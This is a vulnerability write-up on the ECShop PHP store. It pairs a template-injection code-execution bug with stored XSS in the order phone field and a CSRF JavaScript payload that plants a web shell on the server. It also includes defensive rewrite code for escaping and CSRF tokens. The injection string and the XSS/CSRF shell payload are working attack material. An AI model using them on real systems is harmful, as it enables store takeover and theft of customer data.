ECShop is a B2C independent online shop system from ShopEx, suited to enterprises and individuals who want to quickly build a personalized online store. It is a cross-platform open source program built on PHP and MySQL. It supports the sale of various kinds of products: physical goods and virtual goods (such as phone cards and game cards) can be managed in the same store. It provides a flexible and powerful template mechanism; several free built-in templates can be switched at any time in the back end, so different storefront appearances can be created quickly, and templates can also be customized to give the shop its own image.

0x0 Backend getshell

In the fetch() function of includes/cls_template.php:

```php
/**
 * Process the template file
 *
 * @access  public
 * @param   string  $filename
 * @param   string  $cache_id
 *
 * @return  string
 */
function fetch($filename, $cache_id = '')
{
    if (!$this->_seterror)
    {
        error_reporting(E_ALL ^ E_NOTICE);
    }
    $this->_seterror++;

    // If $filename uses the "str:" prefix, the string is evaluated directly
    if (strncmp($filename, 'str:', 4) == 0)
    {
        $out = $this->_eval($this->fetch_str(substr($filename, 4)));
    }
    ............
```

We can see that if $filename starts with "str:", the _eval() function is called to execute the code that follows "str:". Before execution, however, fetch_str() is called on the string to find and replace certain characters. _eval():

```php
function _eval($content)
{
    ob_start();
    eval('?' . '>' . trim($content));
    $content = ob_get_contents();
    ob_end_clean();
    return $content;
}
```

This calls eval() to execute $content. Now check fetch_str():

```php
/**
 * Process a template string
 *
 * @access  public
 * @param   string  $source
 *
 * @return  string
 */
function fetch_str($source)
{
    if (!defined('ECS_ADMIN'))
    {
        $source = $this->smarty_prefilter_preCompile($source);
    }
    // Strip PHP language tags
    $source = preg_replace("/<\?[^><]+\?>|<\%[^><]+\%>|<script[^>]+language[^>]*=[^>]*php[^>]*>[^><]*<\/script\s*>/iU", '', $source);
    // Every {...} tag is handed to $this->select() via the /e modifier
    return preg_replace("/{([^\}\{\n]*)}/e", "\$this->select('\\1');", $source);
}
```

It filters PHP language tags and then resolves each {...} tag through select(). Now we need to find which code calls this function. The following is in wholesale.php:

```php
/* Submit the order */
elseif ($_REQUEST['ac'] == 'submit_order')
{
    include_once(ROOT_PATH . 'includes/lib_order.php');
    .................................
    /* Send an email to the merchant */
    if ($_CFG['service_email'] != '')
    {
        $tpl = get_mail_template('remind_of_new_order');
        ...........................
        $content = $smarty->fetch('str:' . $tpl['template_content']);
        .......
    }
```

At the point where the order is submitted, the code calls get_mail_template() to obtain the content of the remind_of_new_order template and then passes it to fetch() for execution. So if we can control the content of the remind_of_new_order template, ECShop will execute our command. In the back end, find the mail template under template management and change the remind_of_new_order content to

{$phpinfo()']; phpinfo();/*}

After substitution the code becomes

<?php echo $this->_var['phpinfo()']; phpinfo();/*']; ?>

and the code is executed successfully.
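The root cause above is that template tags are turned into PHP source (via the /e modifier and select()) and then eval'd, so the contents of a {...} tag can break out of the quoted string. The following is an added example, not ECShop's code, showing the same tag-substitution step written so that tag contents are treated as data: preg_replace_callback() replaces the /e modifier, select() resolves {$name} placeholders against a variable table and never produces PHP code, and anything else is output as escaped text. The class name SafeTemplate, the $vars table and the assign()/select() behaviour are assumptions of this example.

```php
<?php
// Added example (not ECShop's code): tag substitution without /e and without eval.
// Class name, $vars table and select() behaviour are assumptions.
class SafeTemplate
{
    private $vars = array();

    public function assign($name, $value)
    {
        $this->vars[$name] = $value;
    }

    // Counterpart of the vulnerable fetch_str(): strip PHP tags, then resolve
    // {...} tags. The callback receives the captured text as a plain string.
    public function fetch_str($source)
    {
        $source = preg_replace(
            "/<\?[^><]+\?>|<\%[^><]+\%>|<script[^>]+language[^>]*=[^>]*php[^>]*>[^><]*<\/script\s*>/iU",
            '',
            $source
        );
        return preg_replace_callback('/{([^\}\{\n]*)}/', array($this, 'select'), $source);
    }

    // Only a plain variable reference {$name} is honoured; any other tag is
    // rendered literally and HTML-escaped, so it can never become code.
    public function select($matches)
    {
        $tag = trim($matches[1]);
        if (preg_match('/^\$([A-Za-z_][A-Za-z0-9_]*)$/', $tag, $m)) {
            $value = isset($this->vars[$m[1]]) ? $this->vars[$m[1]] : '';
            return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
        }
        return htmlspecialchars($matches[0], ENT_QUOTES, 'UTF-8');
    }
}

// Constructed sample: a legitimate placeholder next to the tag from the write-up.
$tpl = new SafeTemplate();
$tpl->assign('user_name', 'alice');
echo $tpl->fetch_str('Hello {$user_name}, {$phpinfo()\']; phpinfo();/*}'), "\n";
// Output: Hello alice, {$phpinfo()&#039;]; phpinfo();/*}
```

Because select() returns the rendered text directly, there is no later eval() step and the mail template content remains data even when an administrator (or, as in section 0x2, a forged admin request) edits it. The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so the callback form is also what current PHP requires.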
0x1 Foreground XSS

The front end is not filtered sufficiently in some places, which lets a user construct malicious JavaScript and carry out an XSS attack against the back-end administrator. After registering a user, you can buy anything at will. In the recipient information, the phone field is only checked by client-side JavaScript, with no server-side filtering, so XSS is easy to find here.

0x2 XSS + getshell in the back end

Because there is no CSRF protection, the front-end XSS can reach the back end and make the administrator getshell for us. The following is the JS implementation of getshell:

```javascript
var Shelldata = 'subject = % C3 % DC % C2 % EB % D5 % D2 % BB % D8 & mail_type = 0 & tpl = 1 & content = % 7B % 24user_name % 27% 5D % signature % 28base64_decode % 28% 27c2hlbGwucGhw % 27% 2Cbase64_decode % 29% signature % 3D % 28% 27% 29% 3 Becho + % 24var % 5B % 29% 24user_name % 7D % 0D % 0A % 3C % 2Fp % 3E % 0D % 0A % 3Cp % 3E % 7B % 24user_name % 7D % C4 % FA % BA % C3 % A3 % A1 % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % C4 % FA % D2 % D1 % BE % AD % BD % F8 % D0 % D0 % C1 % CB % C3 % DC % C2 % EB % D6 % D8 % D6 % C3 % B5 % C4 % b2 % D9 % D7 % F7 % A3 % AC % C7 % EB % B5 % E3 % BB % F7 % D2 % D4 % CF % C2 % C1 % B4 % BD % D3 % 28% BB % F2 % D5 % DF % B8 % B4 % D6 % C6 % B5 % BD % C4 % FA % B5 % C4 % E4 % AF % C0 % C0 % C6 % F7 % 29% 3A % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % 3Ca + target % 3D % 22_blank % 22 + href % 3D % 22% 7B % 24reset_email % 7D % 22% 3E % 7B % 24reset_email % 7D % 3C % 2Fa % 3E % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % D2 % D4 % C8 % B7 % C8 % CF % C4 % FA % B5 % C4 % D0 % C2 % C3 % DC % C2 % E B % D6 % D8 % D6 % C3 % B2 % D9 % D7 % F7 % A3 % A1 % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % 7B % 24shop_name % 7D % 3Cbr + % 2F % 3E % 0D % 0A % 7B % 24send_date % 7D % 3C % 2Fp % 3E';
try {
    var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));
    xml.open("POST", '/ecshop/upload/admin/mail_template.php?act=save_template', false);
    xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xml.onreadystatechange = function () { if (xml.readyState == 4) {} };
    xml.send(Shelldata);
} catch (e) {}
```

Upload the JS disguised as an image and reference it, or reference it directly from an external website. For convenience of testing, the order was submitted with a reference to a local file. The administrator views the order, the user then triggers password retrieval at the front end, and the shell (shell.php) is generated in the root directory with password 207.

[screenshot: password-retrieval mail template before the administrator views the order]

[screenshot: mail template after the administrator has viewed the order]

[screenshot: the user retrieves the password at the front end]

[screenshot: shell.php generated in the root directory]
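Sections 0x1 and 0x2 rest on two missing checks: the recipient phone field is validated only in the browser, and the admin mail_template.php?act=save_template action accepts any request carrying the administrator's cookies. The following is an added example, not ECShop's own code, of what those two checks look like server-side: a whitelist validation and output encoding for the phone field, and a per-session CSRF token that the template-save handler must see before it writes anything. The function names, the 'csrf_token' session key and the sample inputs are assumptions of this example.

```php
<?php
// Added example, not ECShop's own code. Function names, the 'csrf_token'
// session key and the sample values are assumptions.

// Accept only a plausible phone number: optional leading '+', then 6 to 20
// digits, spaces or hyphens. Markup or script never reaches the database.
function validate_phone($phone)
{
    return is_string($phone) && preg_match('/^\+?[0-9][0-9 \-]{5,19}$/', $phone) === 1;
}

// Output encoding for the admin order view, so a stored value cannot be
// interpreted as HTML even if validation is bypassed somewhere else.
function escape_html($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// One random token per session, embedded in every admin form as a hidden field.
function csrf_token(array &$session)
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(16));
    }
    return $session['csrf_token'];
}

// Constant-time comparison of the submitted token with the session token.
// A request forged from the front end carries the admin's cookie but not this value.
function csrf_check(array $session, $submitted)
{
    return isset($session['csrf_token'])
        && is_string($submitted)
        && hash_equals($session['csrf_token'], $submitted);
}

// Guard for the template-save action: refuse the request unless the token matches.
function handle_save_template(array $session, array $post)
{
    $submitted = isset($post['csrf_token']) ? $post['csrf_token'] : null;
    if (!csrf_check($session, $submitted)) {
        return 'rejected: missing or invalid CSRF token';
    }
    return 'saved';
}

// Constructed sample values for a stand-alone run.
$samples = array('13800138000', '+86 138-0013-8000', '138<b>x</b>', '');
foreach ($samples as $s) {
    printf("%-20s %s\n", escape_html($s), validate_phone($s) ? 'accepted' : 'rejected');
}

$session = array();
$token = csrf_token($session);
echo handle_save_template($session, array('content' => 'x')), "\n";                         // rejected
echo handle_save_template($session, array('content' => 'x', 'csrf_token' => $token)), "\n"; // saved
```

The phone check and the CSRF check are independent: the first stops the stored XSS from entering the order record, the second stops a forged save_template request from succeeding even if script does run in the administrator's browser. hash_equals() and random_bytes() require PHP 5.6 and PHP 7.0 respectively.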